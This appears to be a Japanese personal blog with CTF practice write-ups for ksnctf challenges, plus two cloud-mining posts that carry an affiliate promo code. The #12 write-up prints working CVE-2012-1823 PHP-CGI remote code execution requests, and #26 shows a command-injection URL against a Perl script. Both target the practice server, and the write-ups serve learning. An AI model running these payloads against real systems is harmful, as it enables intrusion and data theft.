ctfのお勉強 ksnctf #7 Programming

ksnctfを解いてみた

ksnctf

#7 Programming

コンパイルして実行してみたが、cppファイルだけどもC++言語ではない。
いろいろ調べてみるとwhitespaceという言語らしい。

ここ使うと便利。
https://whitespace.kauaveel.ee/

実行するとPINコードをもとめられる。
デバックにアセンブリコードが書かれているので、そこから怪しい数値をいれてみたら通った。

なんか微妙な問題。。

ctfのお勉強 ksnctf #12 hypertext processor

ksnctfを解いてみた

ksnctf

#12 hypertext processor

タイトルからPHP関連かなと想像
何度かアクセスすると下の方の数字は変わるけど上の方の数字2012:1823はかわらず。
とりあえず、ヘッダからバージョン確認

$>curl -I ctfq.sweetduet.info:10080/~q12/
HTTP/1.1 200 OK
Date: Sun, 05 Nov 2017 02:22:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.1
Connection: close
Content-Type: text/html; charset=UTF-8

php5.4.1で検索するとCVE-2012-1823が見つかるので-sでアクセスしてみる
2012:1823はこのことですか。

http://ctfq.sweetduet.info:10080/~q12/index.php?-s

フラグはここにあるよと。
f:id:skymay:20171105111540p:plain

ディレクトリ一覧を取得

curl -v http://ctfq.sweetduet.info:10080/\~q12/index.php\?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -X POST -d "<?php print_r(scandir('.'));?>"

ファイルがわかったので、中身をみます

curl -v http://ctfq.sweetduet.info:10080/\~q12/index.php\?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -X POST -d "<?php echo readfile('flag_flag_flag.txt');?>"

仮想通貨マイニングその後1

先月始めたクラウドマイニング
https://www.genesis-mining.com

一ヶ月経ちました。

どのくらい儲かっているのかというと

一ヶ月で1500円くらいです。

1500*24=36000円

購入当初1ドル112円くらいで300ドル分購入したので、

33600円

36000円-33600円=2400円

二年で2400円かとおもうと正直微妙ですね。

イーサリアムのチャートはこんな感じです。
f:id:skymay:20171105104524p:plain

今後爆発的に上がれば儲けがあるかもしれませんが。。。

なんかこれだと今300ドル分かって二年放置していたほうが儲かるんじゃないかと。。


アフィリエイトでハッシュパワー増強しないと。。
こんなネガティブ記事書いていますが、興味のある方は是非w
Genesis Mining プロモコード:EmF3TV
入力すると3%引きで購入できます。

仮想通貨のマイニングを初めてみる

最近はやりの仮想通貨のマイニングをはじめてみました。

bitcoinはメジャーすぎて個人で掘るのはかなり厳しいとのことなので、他のコインを。
ハード購入してとも思ったのですが、電気代とかスペース考えると日本でやるのは現実的ではないので、
今回はここを使ってクラウドマインングをはじめてみました。
https://www.genesis-mining.com/

二年契約で払いきり、購入後すぐに使える。
いろいろ調べてみたのですが、一番ここがまともそう。なかには倒産するところとかもあるようです。

アカウント作成してハッシュパワーを購入します。Etherを10MH/s購入しました。US$300ほどです。
f:id:skymay:20170918133920p:plain
現在EtherとMoneroの購入ができます。売り切れ(Bitcoin/Litecoin/Zcash/Dash)もあるようなので、買えるときに買ったほうがよいかと思います。


途中報告は随時あっぷしたいとおもいます。

Genesis Mining プロモコード:EmF3TV
入力すると3%引きで購入できますので是非。あくまで自己責任で。

ctfのお勉強 ksnctf #35 simple auth 2 #26 Sherlock Holmes

ksnctfを解いてみた

ksnctf

#35 simple auth 2

認証ページとソースコードが落ちている。
一見SQL injectionかなともおもい。

ソースコードを見るとdbにアクセスしているところが見られる。
dbファイル名入れると直接ダウンロード。

試しにsqliteで開いてみるとノーパスでそのままアクセスできた。
あとはテーブルの中身を探っていくとFLAGが。

#26 Sherlock Holmes

長い文章が。ソースぺージもありステガノを疑ってDiffを取ってみるも
違いはなさそう。

アクセス先URLを見ると、必ず index.plを返してtxtを表示させているようだ。

http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_1.txt
http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_2.txt
http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_3.txt

ルートパスを開くと、
http://ctfq.sweetduet.info:10080/~q26/
ファイルが見えてくる。

flag.txtはあるが、index.plを見ろと。
index.plを見るとヒントが。

ヒントに従って、インジェクション(index.pl/%7Cecho%20h%40ck3d%5C%21%20%3E%20cracked.txt)して、ファイルを作って
FLAGが

ctfのお勉強 ksnctf #14 John

ksnctfを解いてみた

ksnctf

#14 John

問題を見た瞬間からJohn the Ripper かなと推測。
よくみるとここに辞書があるよと書いてある。

user99:$6$SHA512IsStrong$DictionaryIsHere.http//ksnctf.sweetduet.info/q/14/
dicti0nary_8Th64ikELWEsZFrf.txt:15491:0:99999:7:::

辞書をダウンロードして保存。

$>curl ksnctf.sweetduet.info/q/14/dicti0nary_8Th64ikELWEsZFrf.txt > dic.txt

あとはjohnを実行するだけ。
f:id:skymay:20170219102526p:plain

結果を確認する。

#john --show shad

頭の文字がフラグになっているので、それをいれてやる。

ctfのお勉強

ksnctfを解いてみた

ksnctf

そろそろ難しくなってきた。。

#13 Proverb

SSH: ctfq.sweetduet.info:10022
ID: q13
Pass: 8zvWx00MakSCQuGq

sshでアクセスしてみる。ファイルが並んでいる。

-r-------- 2 q13a q13a 22 6月 1 05:21 2012 flag.txt
---s--x--x 1 q13a q13a 14439 6月 1 04:59 2012 proverb
-r--r--r-- 1 root root 755 6月 1 04:58 2012 proverb.txt
-r--r--r-- 1 root root 151 6月 1 04:48 2012 readme.txt

開けるファイルから見ていくとreadme.txtとproverb.txtは読めるみたい
proverbを実行するとproverb.txtを読み込んで表示される様子
readmeには/tmp配下でやれと記載が。

/tmp配下に移動してみるとlsコマンドは実行できないがproverbとかのファイルはある模様。
サブディレクトリを作ってやれとご指定があるので、サブディレクトリ作成して
homeからproverbをコピーしようとするができず。
/tmp配下にあるものをコピーしてみるとコピーできる。
flagもコピーしてflag.txtのファイルをproverb.txtに名前変更して実行すると。。